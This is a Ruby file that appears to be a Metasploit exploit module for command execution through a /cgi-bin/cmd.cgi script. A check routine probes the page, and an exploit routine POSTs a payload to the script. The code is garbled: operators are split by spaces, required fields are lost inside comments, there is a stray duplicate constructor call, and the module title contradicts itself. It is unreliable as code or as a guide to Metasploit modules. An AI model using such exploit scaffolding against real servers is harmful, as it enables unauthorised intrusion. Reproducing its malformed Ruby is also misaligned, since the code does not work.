cgi_cmd_exec.rb

# #
# This module requires Metasploit: https: //metasploit.com/download
# Current source: https: //github.com/rapid7/metasploit-framework
# #

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby for Metasploit Framework Remote Code Execution Vulnerability in /cgi-bin/cmd.cgi',
'Description' => % q { This module exploits a remote code execution vulnerability in the /cgi-bin/cmd.cgi script on Ruby for Metasploit Framework systems
},
'Author' => ['TcherBer'], # an author or list of authors 'Payload' => {}, # payload info # target 's architecture that will receive the payload 
'Platform' => ['unix', 'linux', ], # platform info(Unix, Linux, etc.)
'Targets' => [
["Automatic", {}]
], # targets info(OS version, etc.) # an array of service versions that are vulnerable
}, # an array of references to related security advisories], # a hash of verification information(e.g.file checksum)), # vulnerability disclosure date), # exploit publish date))
super(update_info(info, )) end def check vprint_status("Checking target") res = send_request_cgi({
  "uri" => "/cgi-bin/cmd.cgi",
}) if res && res.code == 200 && res.body = ~/Command Executor/
return Exploit::CheckCode::Vulnerable
else return Exploit::CheckCode::Safe end end def exploit print_status("Sending payload...") send_request_raw({
  "method" => "POST",
  "uri" => "/cgi-bin/cmd.cgi",
  "data" => payload
}) end end